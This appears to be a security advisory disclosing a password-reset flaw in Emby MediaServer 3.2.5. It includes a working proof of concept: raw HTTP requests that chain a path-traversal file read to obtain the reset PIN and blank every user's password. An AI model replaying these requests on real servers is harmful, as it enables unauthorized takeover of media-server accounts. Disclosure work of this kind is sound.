The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Emby MediaServer 3.2.5 Password Reset VulnerabilityEmby MediaServer 3.2.5 Password Reset Vulnerability
Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
3.1.5
3.1.2
3.1.1
3.1.0
3.0.0
Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.
Desc: The issue can be triggered by an unauthenticated actor within the home network
(LAN) only. The attacker doesn't need to specify a valid username to reset the
password. He or she can enter a random string, and using the file disclosure issue
it's possible to read the PIN needed for resetting. This in turn will disclose all
the valid usernames in the emby server and reset all the passwords for all the users
with a blank password. Attackers can exploit this to gain unauthenticated and unauthorized
access to the emby media server management interface.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Ubuntu Linux 14.04.5
MacOS Sierra 10.12.3
SQLite3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5401
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5401.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
22.12.2016
--
1. First we initiate the Forgot Password feature from within our home network:
------------------------------------------------------------------------------
http://10.211.55.3:8096/web/forgotpassword.html
2. Then, we type any random username and hit submit:
----------------------------------------------------
POST /emby/Users/ForgotPassword HTTP/1.1
Host: 10.211.55.3:8096
Connection: keep-alive
Content-Length: 32
accept: application/json
Origin: http://10.211.55.3:8096
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.211.55.3:8096/web/forgotpassword.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1
EnteredUsername=RandomusUsuarius
3. You will get an alert message (Windows/Linux):
-------------------------------------------------
The following file has been created on your server and contains instructions on how to proceed:
C:\Users\lqwrm\AppData\Roaming\\Emby-Server\passwordreset.txt
-- OR --
/var/lib/emby-server/passwordreset.txt
4. Exploiting the file disclosure vulnerability (ZSL-2017-5403):
----------------------------------------------------------------
GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\lqwrm\AppData\Roaming\Emby-Server\passwordreset.txt HTTP/1.1
Host: 10.211.55.3:8096
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close
HTTP/1.1 200 OK
X-UA-Compatible: IE=Edge
Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
ETag: "c4fd834ac2fc99ff99d74c8e994a8a71"
Cache-Control: public
Expires: -1
Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Content-Type: text/plain
Date: Tue, 28 Feb 2017 12:14:51 GMT
Content-Length: 164
Connection: close
Use your web browser to visit:
http://10.211.55.3:8096/web/forgotpasswordpin.html
Enter the following pin code:
6727
The pin code will expire at 91
5. Following the instructions, entering the PIN, results in resetting all the passwords for all the emby users on the system:
-----------------------------------------------------------------------------------------------------------------------------
POST /emby/Users/ForgotPassword/Pin HTTP/1.1
Host: 10.211.55.3:8096
Connection: keep-alive
Content-Length: 9
accept: application/json
Origin: http://10.211.55.3:8096
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.211.55.3:8096/web/forgotpasswordpin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1
Pin=6272
---
We get the message:
Passwords have been removed for the following users. To login, sign in with a blank password.
testingus
test321
beebee
admin
ztefan
lio
miko
dni
embyusertest
joxypoxy
test123
thricer
teppei
admin2
delf1na
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum